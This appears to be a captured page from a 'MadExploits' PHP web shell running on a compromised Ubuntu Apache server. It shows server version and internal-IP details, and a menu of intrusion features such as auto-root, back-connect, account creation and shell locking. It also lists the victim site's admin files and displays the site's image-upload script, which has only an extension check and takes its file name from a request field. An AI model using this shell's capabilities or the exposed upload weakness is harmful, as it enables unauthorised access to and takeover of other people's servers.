Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
caiold1 /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-x--x
css
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
uploadDoc
[ DIR ]
drwxr-x--x
changePassword.php
3.99
KB
-rwxr-x--x
class.admin.php
4.39
KB
-rwxr-x--x
common.php
5.6
KB
-rwxr-x--x
common_old07032022.php
5.4
KB
-rwxr-x--x
dashboard.php
8.35
KB
-rwxr-x--x
dashboard_old07032022.php
7.37
KB
-rwxr-x--x
dbconfig.php
1.22
KB
-rwxr-x--x
editImage.php
2.18
KB
-rwxr-x--x
fpass.php
3.07
KB
-rwxr-x--x
index.php
4
KB
-rwxr-x--x
logout.php
624
B
-rwxr-x--x
password.php
3.51
KB
-rwxr-x--x
projectDetails.php
9.7
KB
-rwxr-x--x
projectDetailsEdit.php
9.02
KB
-rwxr-x--x
projectDetailsEdit_old07032022...
8.63
KB
-rwxr-x--x
projectDetails_old07032022.php
9.16
KB
-rwxr-x--x
publicationEdit.php
9.6
KB
-rwxr-x--x
publicationEdit_old07032022.ph...
8.62
KB
-rwxr-x--x
register.php
5.57
KB
-rwxr-x--x
resetpass.php
5.26
KB
-rwxr-x--x
vacanciesEdit.php
9.19
KB
-rwxr-x--x
vaccancy.php
8.17
KB
-rwxr-x--x
verifyLink.php
10.13
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editImage.php
<?php if ( isset( $_POST[ 'updateImage' ] ) ) { $pID = $_POST[ 'pID' ]; $fundingAgency = $_POST[ 'fundingAgency' ]; //Upload Documents----------------- $pImg = $_FILES[ 'pImg' ][ 'name' ]; if ( $pImg != '' ) { $ext4 = pathinfo( $pImg, PATHINFO_EXTENSION ); $allowed4 = array( 'jpg', 'jpeg', 'png' ); //check if file type is valid if ( in_array( $ext4, $allowed4 ) ) { $pImg = '1' .'-' . $fundingAgency . '-' . $pImg; //set target directory $path4 = 'uploadDoc/'; // $created = @date('Y-m-d H:i:s'); move_uploaded_file( $_FILES[ 'pImg' ][ 'tmp_name' ], ( $path4 . $pImg ) ); } } $projectV->updateImg($pID, $pImg); } ?> <!-- Modal --> <div class="modal fade" id="imgid_<?php echo $row['pID']; ?>" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="staticBackdropLabel" aria-hidden="true"> <div class="modal-dialog"> <form id="editForm" method="post" enctype="multipart/form-data"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="staticBackdropLabel">Modal title</h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body"> <label for="exampleFormControlTextarea1" class="form-label">Project Image</label> <input type="file" name="pImg" class="form-control" onchange="prevs()" required> <input type="hidden" class="form-control" name="pID" value="<?php echo $row['pID']; ?>"> <input type="hidden" class="form-control" name="fundingAgency" value="<?php echo $row['fundingAgency']; ?>"> <p class="help-block" style="font-size: 14px;">Only jpeg, jpg, png and tiff can be uploaded</p> <p style="clear: both;"></p> <p> <img id="fram" src="uploadDoc/<?php echo $row['pImg']; ?>" class="displayImg" /></p> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button> <input class="btn btn-primary" type="submit" name="updateImage" value="Submit"> </div> </div> </form> </div> </div>
Close